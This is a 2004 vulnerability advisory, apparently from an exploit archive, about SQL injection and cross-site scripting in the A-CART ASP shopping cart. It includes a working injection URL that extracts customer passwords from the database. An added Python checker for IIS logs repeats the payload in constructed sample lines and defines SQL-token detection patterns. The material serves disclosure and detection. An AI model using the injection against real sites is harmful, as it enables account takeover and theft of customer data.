acartSQL.txt

Posted Mar 29, 2004
Authored by Manuel Lopez

A-CART Pro and A-CART 2.0 suffer from input validation holes that allow for SQL injection and cross site scripting attacks. Full exploitation demonstrated.

tags | exploit, xss, sql injection
SHA-256 | 8f3fb7e46432c3d39ecb946dbebf7c30a6f165544414b8ef971ac87628e8bb6b

#Title: A-CART Pro & A-CART 2.0 Input Validation Holes 

#Software: A-CART Pro & A-CART 2.0
#Vendor: http://www.alanward.net
#Underlying OS: Windows.

#Description:

A-CART is an ASP shopping cart application written in VBScript. The system
allows a customer to browse through an inventory of products and add these
items to their virtual shopping cart. Features include hierarchical
categories, featured products, custom attributes and user profiles.

#Vulnerabilities:

A-CART input validation holes let remote users inject SQL and conduct
Cross-Site Scripting attacks.

#SQL Injection#

An SQL injection vulnerability allows a remote attacker to execute arbitrary
SQL statements against the database and gain administrator access.

/category.asp?catcode=[SqlInjection]

#-Exploit-#

http://host/category.asp?catcode=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname='[Username]'
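
Added example, not part of the advisory: a small Python checker that reads IIS W3C log lines (the sample below is constructed) and flags category.asp requests whose catcode is not the integer the application expects and carries SQL tokens, which is the signature of the injection described above. The log field names are the standard IIS ones; the table and column names only appear inside the sample payload.

```python
"""Added example, not from the advisory: flag catcode SQL injection attempts
against A-CART's category.asp in IIS W3C logs. Sample log lines are constructed."""
import re
from urllib.parse import parse_qs
# Constructed sample in IIS W3C extended format (only the fields needed here).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-03-29 10:00:01 192.0.2.10 GET /category.asp catcode=3 200
2004-03-29 10:00:02 192.0.2.10 GET /category.asp catcode=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname='admin' 200
2004-03-29 10:00:03 192.0.2.11 GET /category.asp catcode=12%27%20or%201=1-- 500
2004-03-29 10:00:04 192.0.2.12 GET /billing.asp - 200
"""

# catcode is an integer category code in the application; anything else is suspect.
INT_RE = re.compile(r"^\d{1,9}$")
# Tokens that turn a numeric predicate into a different statement.
SQL_RE = re.compile(r"\b(union|select|from|where|or|and)\b|--|'", re.IGNORECASE)

def parse_w3c(text):
    """Yield one dict per request line, using the #Fields header for column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))

def suspicious_catcode(row):
    """Return the decoded catcode of a category.asp request that is not a plain
    integer and carries SQL tokens; None for clean rows."""
    if row.get("cs-uri-stem", "").lower() != "/category.asp":
        return None
    query = row.get("cs-uri-query", "-")
    if query == "-":
        return None
    for value in parse_qs(query).get("catcode", []):  # parse_qs percent-decodes
        if not INT_RE.match(value) and SQL_RE.search(value):
            return value
    return None

def find_injection_attempts(text):
    """Return (client ip, decoded catcode) for every flagged request."""
    return [(row["c-ip"], v) for row in parse_w3c(text)
            if (v := suspicious_catcode(row)) is not None]
```

The same whitelist check (integer only, bounded length) is what category.asp itself should apply to catcode before the value reaches the query, alongside a parameterised statement.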

#Cross-Site Scripting#

This product is vulnerable to Cross-Site Scripting, which would allow
attackers to inject HTML and script code into the pages and have it execute
in the client's browser.
The vulnerability exists in the user information forms in deliver.asp and
billing.asp.

#Solution:

No solution was available at the time of this entry. The vendor was contacted
three times; all three mails went unanswered.

#Credits:

Manuel López. mantra@gulo.org